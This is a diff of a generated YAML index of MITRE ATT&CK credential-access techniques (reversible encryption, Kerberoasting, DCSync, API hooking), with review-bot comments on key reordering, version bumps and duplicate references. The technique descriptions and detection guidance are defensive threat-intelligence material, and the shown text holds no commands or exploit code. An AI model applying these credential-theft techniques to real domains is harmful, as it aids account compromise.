property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
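Review bot: this hunk reads as if T1556.005 were deleted and T1556.001 truncated, but it is only key reordering: the `type`/`id`/`created`/`external_references` block of T1556.001 is re-emitted on the `+` lines and T1556.005 is re-opened after it. Content-wise T1556.001 goes 2.0 to 2.1, gains `x_mitre_domains`, `x_mitre_platforms` and `revoked: false`, and drops `x_mitre_permissions_required: Administrator`. Having the generator emit keys in a fixed order would keep future refreshes to per-field diffs instead of cross-object rewrites like this one.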
@@ -47412,6 +48110,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -47422,23 +48121,50 @@ credential-access:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1111:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:37:20.612Z'
name: Multi-Factor Authentication Interception
description: "Adversaries may target multi-factor authentication (MFA) mechanisms,
(i.e., smart cards, token generators, etc.) to gain access to credentials
@@ -47509,9 +48235,8 @@ credential-access:
url: https://sec.okta.com/scatterswine
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1003.003:
technique:
@@ -47570,12 +48295,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.003
atomic_tests: []
T1558.003:
technique:
- modified: '2023-03-30T21:01:46.538Z'
+ modified: '2024-09-23T22:20:10.994Z'
name: 'Steal or Forge Kerberos Tickets: Kerberoasting'
description: "Adversaries may abuse a valid Kerberos ticket-granting ticket
(TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket
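Review bot: T1003.003 keeps `x_mitre_attack_spec_version: 3.1.0` in the context lines and only loses `spec_version`, so it is another object not brought to 3.2.0 alongside the rest. If the upstream T1003.003 object is genuinely still at 3.1.0 that is fine, but it is worth verifying, since the patch otherwise moves everything it touches to 3.2.0.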
@@ -47607,6 +48331,7 @@ credential-access:
phase_name: credential-access
x_mitre_contributors:
- Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
TGS service ticket requests. Particularly investigate irregular patterns of
activity (ex: accounts making numerous requests, Event ID 4769, within a small
@@ -47616,7 +48341,6 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -47628,111 +48352,49 @@ credential-access:
id: attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee
created: '2020-02-11T18:43:38.588Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1558/003
external_id: T1558.003
+ - source_name: Microsoft Detecting Kerberoasting Feb 2018
+ description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+ using Azure Security Center. Retrieved March 23, 2018.
+ url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- source_name: Empire InvokeKerberoast Oct 2016
description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved
March 22, 2018.
url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
+ - source_name: SANS Attacking Kerberos Nov 2014
+ description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+ Guard Dog of Hades. Retrieved March 22, 2018.
+ url: https://redsiege.com/kerberoast-slides
- source_name: AdSecurity Cracking Kerberos Dec 2015
description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
Domain. Retrieved March 22, 2018.
url: https://adsecurity.org/?p=2293
- - source_name: Microsoft Detecting Kerberoasting Feb 2018
- description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
- using Azure Security Center. Retrieved March 23, 2018.
- url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- - source_name: Microsoft SPN
- description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
- 2018.
- url: https://msdn.microsoft.com/library/ms677949.aspx
- source_name: Microsoft SetSPN
description: Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN
Syntax (Setspn.exe). Retrieved March 22, 2018.
url: https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
- - source_name: SANS Attacking Kerberos Nov 2014
- description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
- Guard Dog of Hades. Retrieved March 22, 2018.
- url: https://redsiege.com/kerberoast-slides
+ - source_name: Microsoft SPN
+ description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
+ 2018.
+ url: https://msdn.microsoft.com/library/ms677949.aspx
- source_name: Harmj0y Kerberoast Nov 2016
description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz.
- Retrieved March 23, 2018.
- url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
+ Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1558.003
atomic_tests: []
T1003.006:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ExtraHop
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
- type: attack-pattern
- created: '2020-02-11T18:45:34.293Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1003.006
- url: https://attack.mitre.org/techniques/T1003/006
- - url: https://msdn.microsoft.com/library/cc228086.aspx
- description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
- Service (DRS) Remote Protocol. Retrieved December 4, 2017.
- source_name: Microsoft DRSR Dec 2017
- - url: https://msdn.microsoft.com/library/dd207691.aspx
- description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
- 4, 2017.
- source_name: Microsoft GetNCCChanges
- - url: https://wiki.samba.org/index.php/DRSUAPI
- description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
- source_name: Samba DRSUAPI
- - url: https://source.winehq.org/WineAPI/samlib.html
- description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
- source_name: Wine API samlib.dll
- - url: https://adsecurity.org/?p=1729
- description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
- and Detection. Retrieved August 7, 2017.
- source_name: ADSecurity Mimikatz DCSync
- - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
- description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
- Oh My. Retrieved August 7, 2017.
- source_name: Harmj0y Mimikatz and DCSync
- - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
- description: Warren, J. (2017, July 11). Manipulating User Passwords with
- Mimikatz. Retrieved December 4, 2017.
- source_name: InsiderThreat ChangeNTLM July 2017
- - url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
- description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
- August 7, 2017.
- source_name: GitHub Mimikatz lsadump Module
- - url: https://msdn.microsoft.com/library/cc237008.aspx
- description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
- Retrieved December 6, 2017.
- source_name: Microsoft NRPC Dec 2017
- - url: https://msdn.microsoft.com/library/cc245496.aspx
- description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
- Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
- source_name: Microsoft SAMR
- - url: https://adsecurity.org/?p=1729
- description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
- and Detection. Retrieved December 4, 2017.
- source_name: AdSecurity DCSync Sept 2015
- - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
- description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
- Oh My. Retrieved December 4, 2017.
- source_name: Harmj0y DCSync Sept 2015
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:54:08.312Z'
name: 'OS Credential Dumping: DCSync'
description: |-
Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
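Review bot: for T1558.003 the `Harmj0y Kerberoast Nov 2016` reference changes URL to https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/ with a new retrieval date of September 23, 2024, and the remaining references are reordered by citation text with no entries lost. The T1003.006 portion of the hunk is the same delete/re-add churn from key reordering already noted for T1556.001; the object is rebuilt in full in the next hunk.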
@@ -47743,26 +48405,88 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - ExtraHop
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Access'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
+ created: '2020-02-11T18:45:34.293Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/006
+ external_id: T1003.006
+ - source_name: GitHub Mimikatz lsadump Module
+ description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
+ August 7, 2017.
+ url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
+ - source_name: ADSecurity Mimikatz DCSync
+ description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+ and Detection. Retrieved August 7, 2017.
+ url: https://adsecurity.org/?p=1729
+ - source_name: AdSecurity DCSync Sept 2015
+ description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+ and Detection. Retrieved December 4, 2017.
+ url: https://adsecurity.org/?p=1729
+ - source_name: Microsoft DRSR Dec 2017
+ description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
+ Service (DRS) Remote Protocol. Retrieved December 4, 2017.
+ url: https://msdn.microsoft.com/library/cc228086.aspx
+ - source_name: Microsoft NRPC Dec 2017
+ description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
+ Retrieved December 6, 2017.
+ url: https://msdn.microsoft.com/library/cc237008.aspx
+ - source_name: Microsoft GetNCCChanges
+ description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
+ 4, 2017.
+ url: https://msdn.microsoft.com/library/dd207691.aspx
+ - source_name: Microsoft SAMR
+ description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
+ Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
+ url: https://msdn.microsoft.com/library/cc245496.aspx
+ - source_name: Samba DRSUAPI
+ description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
+ url: https://wiki.samba.org/index.php/DRSUAPI
+ - source_name: Harmj0y DCSync Sept 2015
+ description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+ Oh My. Retrieved December 4, 2017.
+ url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+ - source_name: Harmj0y Mimikatz and DCSync
+ description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+ Oh My. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+ - source_name: InsiderThreat ChangeNTLM July 2017
+ description: Warren, J. (2017, July 11). Manipulating User Passwords with
+ Mimikatz. Retrieved December 4, 2017.
+ url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
+ - source_name: Wine API samlib.dll
+ description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
+ url: https://source.winehq.org/WineAPI/samlib.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.006
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
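Review bot: the reordered T1003.006 references carry two entries with the same URL (`ADSecurity Mimikatz DCSync` and `AdSecurity DCSync Sept 2015`, both https://adsecurity.org/?p=1729) and two for the same harmj0y post, one updated to https://blog.harmj0y.net/... and one still at http://www.harmj0y.net/.... These come from upstream and should not be hand-patched in a generated file, but if this index feeds a link checker the surviving plain-http URL will be flagged, so note it as a known upstream duplicate. The removal of `x_mitre_permissions_required: Administrator` and the 1.0 to 1.1 bump are consistent with the rest of the patch.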
@@ -47775,6 +48499,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -47811,17 +48536,17 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
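Review bot: the T1556 platform list swaps `Azure AD`, `Google Workspace` and `Office 365` for `Office Suite` and `Identity Provider` (version 2.4 to 2.5, matching the ATT&CK v16 platform consolidation). Any per-platform index that is keyed on the old platform strings will no longer find this technique unless the index generator maps `Office Suite` and `Identity Provider` back onto those names, so check the platform-to-index mapping in the same PR. The `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` lines inserted higher up in the object are the same values that disappear lower down, so those are key moves, not value changes.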
@@ -47867,81 +48592,10 @@ credential-access:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.004:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
- type: attack-pattern
- created: '2020-02-11T19:01:15.930Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1056.004
- url: https://attack.mitre.org/techniques/T1056/004
- - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
- description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
- Retrieved December 18, 2017.
- url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
- - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
- description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
- source_name: Microsoft Hook Overview
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Elastic Process Injection July 2017
- - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
- description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
- Retrieved December 12, 2017.'
- source_name: Adlice Software IAT Hooks Oct 2014
- - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
- description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
- Mode. Retrieved December 20, 2017.'
- source_name: MWRInfoSecurity Dynamic Hooking 2015
- - url: https://www.exploit-db.com/docs/17802.pdf
- description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
- December 12, 2017.
- source_name: HighTech Bridge Inline Hooking Sept 2011
- - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
- description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
- Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
- source_name: Volatility Detecting Hooks Sept 2012
- - url: https://github.com/prekageo/winhook
- description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
- source_name: PreKageo Winhook Jul 2011
- - url: https://github.com/jay/gethooks
- description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
- 12, 2017.
- source_name: Jay GetHooks Sept 2011
- - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
- description: Felici, M. (2006, December 6). Any application-defined hook procedure
- on my machine?. Retrieved December 12, 2017.
- source_name: Zairon Hooking Dec 2006
- - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
- description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
- against user-land. Retrieved December 12, 2017.'
- source_name: EyeofRa Detecting Hooking June 2017
- - url: http://www.gmer.net/
- description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
- source_name: GMER Rootkits
- - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
- description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
- December 12, 2017.
- source_name: Microsoft Process Snapshot
- - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
- description: Stack Exchange - Security. (2012, July 31). What are the methods
- to find hooked functions and APIs?. Retrieved December 12, 2017.
- source_name: StackExchange Hooks Jul 2012
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-27T21:03:56.385Z'
name: 'Input Capture: Credential API Hooking'
description: |
Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
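Review bot: this hunk is hard to review because the whole T1056.004 object (platforms, domains, id, created, every external reference) is deleted here and re-emitted with a different key order in the following hunk, with `type`/`id`/`created` now leading instead of `x_mitre_platforms`; the only value change inside it, the `modified` bump from 2022-04-25 to 2024-08-27, is buried under roughly seventy moved lines. If the generator writes keys in whatever order the source bundle happens to use, sort keys (or pin the previous order) before dumping so that future upstream refreshes produce diffs that show value changes only. The `spec_version: '2.1'` removal for T1556 at the top of the hunk is the first of many such removals in this file and deserves an explicit sentence in the PR description.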
@@ -47954,28 +48608,94 @@ credential-access:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+ created: '2020-02-11T19:01:15.930Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1056/004
+ external_id: T1056.004
+ - source_name: EyeofRa Detecting Hooking June 2017
+ description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+ against user-land. Retrieved December 12, 2017.'
+ url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+ - source_name: Zairon Hooking Dec 2006
+ description: Felici, M. (2006, December 6). Any application-defined hook procedure
+ on my machine?. Retrieved December 12, 2017.
+ url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+ - source_name: GMER Rootkits
+ description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+ url: http://www.gmer.net/
+ - source_name: MWRInfoSecurity Dynamic Hooking 2015
+ description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+ Mode. Retrieved December 20, 2017.'
+ url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+ - source_name: Elastic Process Injection July 2017
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ - source_name: HighTech Bridge Inline Hooking Sept 2011
+ description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ December 12, 2017.
+ url: https://www.exploit-db.com/docs/17802.pdf
+ - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+ description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+ Retrieved December 18, 2017.
+ url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+ - source_name: Microsoft Hook Overview
+ description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Process Snapshot
+ description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+ December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+ - source_name: PreKageo Winhook Jul 2011
+ description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+ url: https://github.com/prekageo/winhook
+ - source_name: Jay GetHooks Sept 2011
+ description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+ 12, 2017.
+ url: https://github.com/jay/gethooks
+ - source_name: StackExchange Hooks Jul 2012
+ description: Stack Exchange - Security. (2012, July 31). What are the methods
+ to find hooked functions and APIs?. Retrieved December 12, 2017.
+ url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ - source_name: Adlice Software IAT Hooks Oct 2014
+ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+ Retrieved December 12, 2017.'
+ url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+ - source_name: Volatility Detecting Hooks Sept 2012
+ description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+ Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+ url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1056.004
atomic_tests: []
T1552.007:
technique:
- modified: '2023-10-31T14:00:00.188Z'
